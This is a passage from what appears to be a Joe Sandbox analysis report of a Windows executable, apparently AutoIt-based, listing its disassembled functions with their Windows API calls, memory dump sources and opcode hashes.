                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00CA2F94
                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CA2FA9
                                                                                      • DestroyWindow.USER32(?), ref: 00CA2FB1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                      • String ID: SysAnimate32
                                                                                      • API String ID: 3529120543-1011021900
                                                                                      • Opcode ID: 40f48bdcd1ab299f82e19f6da973b4ab93f115a41ce50ebba2adc8959178754d
                                                                                      • Instruction ID: 3ab828185e22be473cb1bbfb5e094ee1c93a50b0473ede383bc50503a77c7d07
                                                                                      • Opcode Fuzzy Hash: 40f48bdcd1ab299f82e19f6da973b4ab93f115a41ce50ebba2adc8959178754d
                                                                                      • Instruction Fuzzy Hash: 8F218E71204226AFEB104FA8DC80FBB77B9EB5A36CF104619F960D6190D771DD91A760
                                                                                      Function 00C34D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C34D1E,00C428E9,?,00C34CBE,00C428E9,00CD88B8,0000000C,00C34E15,00C428E9,00000002), ref: 00C34D8D
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C34DA0
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00C34D1E,00C428E9,?,00C34CBE,00C428E9,00CD88B8,0000000C,00C34E15,00C428E9,00000002,00000000), ref: 00C34DC3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: eee71ac125b8f790ec1914ce12af77729173d693399b5009432948e640a862f3
                                                                                      • Instruction ID: da7b8ece9206d2ab7934444a2674886cb9fc8cfe7d8412fd422a871b817668d8
                                                                                      • Opcode Fuzzy Hash: eee71ac125b8f790ec1914ce12af77729173d693399b5009432948e640a862f3
                                                                                      • Instruction Fuzzy Hash: A7F04F35A50218BBDB159F94DC89BEEBFF5EF44755F1001A5F906A3260CF70AE40DA90
                                                                                      Function 00C14E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C14EDD,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14E9C
                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C14EAE
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00C14EDD,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14EC0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                      • API String ID: 145871493-3689287502
                                                                                      • Opcode ID: e49798c01fbd1eca6d3d0f9366d2710822753251406b5e696bc540c34346b2cb
                                                                                      • Instruction ID: 1fea217f33125edcca3ae138d9685952d82a76406bb3c220bbb8ec9c907af52f
                                                                                      • Opcode Fuzzy Hash: e49798c01fbd1eca6d3d0f9366d2710822753251406b5e696bc540c34346b2cb
                                                                                      • Instruction Fuzzy Hash: BBE0CD36B015225BD23117257C58BAFA554AF83F667050125FE04D3240DB60CE4154B1
                                                                                      Function 00C14E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C53CDE,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14E62
                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C14E74
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00C53CDE,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14E87
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                      • API String ID: 145871493-1355242751
                                                                                      • Opcode ID: d40dd69525ea1dd5c2c29287f2e3630acde5de0f3be1bd3152c34e99027996fb
                                                                                      • Instruction ID: 2bb1281f7142238e7de737be0f34ce43d41b2c800ef7d54c26feeba7189872b1
                                                                                      • Opcode Fuzzy Hash: d40dd69525ea1dd5c2c29287f2e3630acde5de0f3be1bd3152c34e99027996fb
                                                                                      • Instruction Fuzzy Hash: 41D0C2366026235746221B247C08FCFAA18AF83B193050221FA00A3110CF21CE5291E0
                                                                                      Function 00C82947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C82C05
                                                                                      • DeleteFileW.KERNEL32(?), ref: 00C82C87
                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C82C9D
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C82CAE
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C82CC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Delete$Copy
                                                                                      • String ID:
                                                                                      • API String ID: 3226157194-0
                                                                                      • Opcode ID: 6f2c58ec06e1b343a1d705b0ca89c902f01f47bcd87f1175a64d84ada0d85ce1
                                                                                      • Instruction ID: ab5c2f6627292c67927536d310c69987a53dc7a462d74883cf571680836fc9e5
                                                                                      • Opcode Fuzzy Hash: 6f2c58ec06e1b343a1d705b0ca89c902f01f47bcd87f1175a64d84ada0d85ce1
                                                                                      • Instruction Fuzzy Hash: 72B17D71A00119ABDF25EFA4CC89EEEB7BCEF49314F0040A6F509E6141EA319A449F64
                                                                                      Function 00C9A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00C9A427
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C9A435
                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C9A468
                                                                                      • CloseHandle.KERNEL32(?), ref: 00C9A63D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                      • String ID:
                                                                                      • API String ID: 3488606520-0
                                                                                      • Opcode ID: f6e2df26c3e90f484c4381e2025157d06cabd47ef33ea4e88449fc42dc916bdd
                                                                                      • Instruction ID: f47ebaee279ce20c6e5a25763d6909c04b5f2a91f02a81d2a2e233eaf0217ec6
                                                                                      • Opcode Fuzzy Hash: f6e2df26c3e90f484c4381e2025157d06cabd47ef33ea4e88449fc42dc916bdd
                                                                                      • Instruction Fuzzy Hash: 33A1A1716043019FDB20DF28D886F2AB7E5AF84714F14881DF96A9B392DB70ED41DB92
                                                                                      Function 00C4BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00CB3700), ref: 00C4BB91
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00CE121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00C4BC09
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00CE1270,000000FF,?,0000003F,00000000,?), ref: 00C4BC36
                                                                                      • _free.LIBCMT ref: 00C4BB7F
                                                                                        • Part of subcall function 00C429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000), ref: 00C429DE
                                                                                        • Part of subcall function 00C429C8: GetLastError.KERNEL32(00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000,00000000), ref: 00C429F0
                                                                                      • _free.LIBCMT ref: 00C4BD4B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                      • String ID:
                                                                                      • API String ID: 1286116820-0
                                                                                      • Opcode ID: 563bd492f2a43a7eda40daadd938c4fd51c985672f7fce28ef80ee0400acab54
                                                                                      • Instruction ID: 62f17794217241d2198ddf3f4fb248e1095d8094e5dc2fb487a67fe8caf62ea8
                                                                                      • Opcode Fuzzy Hash: 563bd492f2a43a7eda40daadd938c4fd51c985672f7fce28ef80ee0400acab54
                                                                                      • Instruction Fuzzy Hash: 6851C672D00219AFCB14EF669CC1AAEB7BCFF41320F14426AE564D71A1EB30DE419B90
                                                                                      Function 00C7E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C7DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C7CF22,?), ref: 00C7DDFD
                                                                                        • Part of subcall function 00C7DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C7CF22,?), ref: 00C7DE16
                                                                                        • Part of subcall function 00C7E199: GetFileAttributesW.KERNEL32(?,00C7CF95), ref: 00C7E19A
                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00C7E473
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00C7E4AC
                                                                                      • _wcslen.LIBCMT ref: 00C7E5EB
                                                                                      • _wcslen.LIBCMT ref: 00C7E603
                                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00C7E650
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 3183298772-0
                                                                                      • Opcode ID: 4160e5ece8178b916a1bdff142dad0fbfb8cc8d00ef7996575389ae1bc296bb8
                                                                                      • Instruction ID: e854ee60e6ac36861f1b441a2c59904627254910c7fe17ea5423966e2dc87c4d
                                                                                      • Opcode Fuzzy Hash: 4160e5ece8178b916a1bdff142dad0fbfb8cc8d00ef7996575389ae1bc296bb8
                                                                                      • Instruction Fuzzy Hash: 025182B35083455BC724EB90D891ADF73ECAF89340F00891EF699D3191EF74A688D766
                                                                                      Function 00C9B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C9C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C9B6AE,?,?), ref: 00C9C9B5
                                                                                        • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9C9F1
                                                                                        • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9CA68
                                                                                        • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9CA9E
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9BAA5
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C9BB00
                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C9BB63
                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00C9BBA6
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C9BBB3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                      • String ID:
                                                                                      • API String ID: 826366716-0
                                                                                      • Opcode ID: 5d25b9bfaae1c6518b7282bbb5f4a6a05e0cc843cac943bf330215d71d227cb4
                                                                                      • Instruction ID: 6f6cdf2643cb2387a79f28f1b1ad3daad3093624fd1e2a53b42dd6ed816a6731
                                                                                      • Opcode Fuzzy Hash: 5d25b9bfaae1c6518b7282bbb5f4a6a05e0cc843cac943bf330215d71d227cb4
                                                                                      • Instruction Fuzzy Hash: D561B131208241AFD714DF14C5D4E6ABBE5FF85308F14855CF49A8B2A2DB31ED46DB92
                                                                                      Function 00C78BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 00C78BCD
                                                                                      • VariantClear.OLEAUT32 ref: 00C78C3E
                                                                                      • VariantClear.OLEAUT32 ref: 00C78C9D
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C78D10
                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C78D3B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                                      • String ID:
                                                                                      • API String ID: 4136290138-0
                                                                                      • Opcode ID: c1359f2ca0c33f08e9ccb3bd78714b14a9995078b4b05103e81af0d347c53b2c
                                                                                      • Instruction ID: b1abe23b8b4e8dc1ce952cf6fda6d2b313010f12c2762d41a1b27f49aa827e7d
                                                                                      • Opcode Fuzzy Hash: c1359f2ca0c33f08e9ccb3bd78714b14a9995078b4b05103e81af0d347c53b2c
                                                                                      • Instruction Fuzzy Hash: B7515AB5A0021AEFCB14CF68C894AAAB7F8FF9D314B158559E919DB350E730E911CF90
                                                                                      Function 00C88AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C88BAE
                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00C88BDA
                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C88C32
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C88C57
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C88C5F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                                      • String ID:
                                                                                      • API String ID: 2832842796-0
                                                                                      • Opcode ID: a3ee345b129d969195e09cd3e6cc026b2ecbfe7208abed1fad42213ecfb04292
                                                                                      • Instruction ID: bdc7fbc2dcff219b295016b474f2fc72baf5780d21315524468f0625539b4a98
                                                                                      • Opcode Fuzzy Hash: a3ee345b129d969195e09cd3e6cc026b2ecbfe7208abed1fad42213ecfb04292
                                                                                      • Instruction Fuzzy Hash: F8514D35A002159FCB05DF64C881EADBBF5FF4A314F088458E849AB362DB31ED55EB90
                                                                                      Function 00C98EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00C98F40
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00C98FD0
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C98FEC
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00C99032
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00C99052
                                                                                        • Part of subcall function 00C2F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00C81043,?,7529E610), ref: 00C2F6E6
                                                                                        • Part of subcall function 00C2F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00C6FA64,00000000,00000000,?,?,00C81043,?,7529E610,?,00C6FA64), ref: 00C2F70D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                      • String ID:
                                                                                      • API String ID: 666041331-0
                                                                                      • Opcode ID: 81b1ca6c8c6a22252653000ffdcf1b044b63b18d7103bcd54be9710145e62ae4
                                                                                      • Instruction ID: a8ad85606f93104bda9b585467fe16505e695a43e2987c5681154cc39386a70b
                                                                                      • Opcode Fuzzy Hash: 81b1ca6c8c6a22252653000ffdcf1b044b63b18d7103bcd54be9710145e62ae4
                                                                                      • Instruction Fuzzy Hash: B0513A35600205DFCB15DF58C4989ADBBF1FF4A314B0480A8E91A9B362DB31EE86DF90
                                                                                      Function 00CA6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00CA6C33
                                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00CA6C4A
                                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00CA6C73
                                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C8AB79,00000000,00000000), ref: 00CA6C98
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00CA6CC7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long$MessageSendShow
                                                                                      • String ID:
                                                                                      • API String ID: 3688381893-0
                                                                                      • Opcode ID: 7431b0559d88aa7e572abf47625feb42d022e5df2e7057b2c69450c69596d8cb
                                                                                      • Instruction ID: fabb9fb7dc11cd06010b933f15b71ec453d4f0f69fe82026282f96f5ecfe4a7c
                                                                                      • Opcode Fuzzy Hash: 7431b0559d88aa7e572abf47625feb42d022e5df2e7057b2c69450c69596d8cb
                                                                                      • Instruction Fuzzy Hash: 7441D435A04105AFD724DF38CC94FA97BA5EB0B36CF190228F8A5A72E1C771EE40DA50
                                                                                      Function 00C42051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                      Download Yara Rule
